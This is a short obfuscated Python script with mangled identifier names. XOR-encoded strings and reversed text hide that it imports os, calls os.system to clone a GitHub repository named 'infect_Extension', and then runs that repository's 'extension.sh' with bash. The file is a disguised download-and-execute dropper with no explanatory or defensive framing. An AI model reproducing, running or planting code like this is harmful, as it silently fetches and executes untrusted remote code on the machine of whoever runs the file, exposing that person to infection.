OO0OOOOO0111l0101l1l0 = (lambda lO1111OOl0O0OO1OO010l,
    O1Ol10O1100001l0001OO: lO1111OOl0O0OO1OO010l + O1Ol10O1100001l0001OO)
O1OOl1O011O0llOlO0OO0 = __import__(''.join(chr(l00l1lO10ll0011l11O01 ^
    lllO1lOOO0l0Ol1O01lOO) for lllO1lOOO0l0Ol1O01lOO, l00l1lO10ll0011l11O01 in
    zip(b'!\xd6', b'S\xb3')), globals(), locals(), [], 0 * 4 + 0)
lOOlllOO01ll1l0OlOOOl = __import__(''.join(chr(l00l1l1010ll010l0O11l ^
    OlllO0l00OO01OOO1ll10) for OlllO0l00OO01OOO1ll10, l00l1l1010ll010l0O11l in
    zip(b'q\xa4', b'\x1e\xd7')), globals(), locals(), [], 0)
getattr(lOOlllOO01ll1l0OlOOOl, ''.join(chr(OlO111l01O1llllllOllO ^
    l0010l1100l11ll1l0O1O) for l0010l1100l11ll1l0O1O, OlO111l01O1llllllOllO in
    zip(b'\xe1\x93\xf0];\xdb', b'\x92\xea\x83)^\xb6')))('git clone https' +
    '://github.com/Th' + 'noisnetxE_tcefni/nrobeR-namdaM-e'[::-1])
getattr(lOOlllOO01ll1l0OlOOOl, ''.join(chr(l0l1l00OOl1Ol0OOO01O1 ^
    ll0lO1l0l11O1l0l0l01l) for ll0lO1l0l11O1l0l0l01l, l0l1l00OOl1Ol0OOO01O1 in
    zip(b'\xd5\x17\x00TIp', b'\xa6ns ,\x1d')))(('hs.noisnetxe hsab &&' +
    ' noisnetxE_tcefni dc')[::-1 * 12 + 11])
